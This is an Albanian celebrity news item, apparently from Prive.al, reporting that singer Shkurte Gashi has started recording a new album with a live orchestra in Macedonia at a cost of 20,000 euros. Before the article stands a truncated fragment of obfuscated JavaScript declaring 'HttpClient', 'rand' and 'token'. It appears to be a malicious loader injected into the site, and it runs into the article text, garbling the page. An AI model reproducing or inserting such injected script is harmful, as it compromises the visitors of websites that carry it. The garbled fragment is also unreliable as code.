;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Shkurte Gashi nis punën për albumin e ri

By

Albumet në diskografinë shqiptare në masë të madhe po evitohen nga artistët. Të rrallë janë ata që investojnë duke zgjedhur videoklipet si më profitabile krahasuar me albumet.

Por e njejta nuk vlen për këngëtaren Shkurte Gashi. Ajo në studion e Virusit në Maqedoni ka nisur punën për albumin e saj të ri i cili do të përmbajë minimum tetë këngë të gjitha të reja.

Inçizimi që do të bëhet në studion e Virusit në Maqedoni do të përmbajë tinguj të gjallë nga orkestra me instrumentistët më të mirë të fushës.

Siç merr vesh Prive, i gjithë ky projekt do të kapë kosto prej 20.000 eurosh. Albumi do të publikohet pas vitit të ri.

Ndryshe, Shkurte Gashi ishte tejet aktive me pjesëmarrje në dasma shqiptare përgjatë tërë sezonit veror. /Prive.al/

Artikuj të ngjashëm